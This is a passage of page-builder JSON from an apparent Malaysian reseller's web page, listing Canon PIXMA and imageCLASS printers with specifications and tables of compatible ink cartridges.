]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td>\\n<td>Maintenance Cartridge MC-20<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Blue)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Chroma Optimizer)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Matte Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Red)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY iB4170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E4270<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E470<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E477<\\/td>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E480<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E510<\\/td>\\n<td>CL-98 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-88 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560 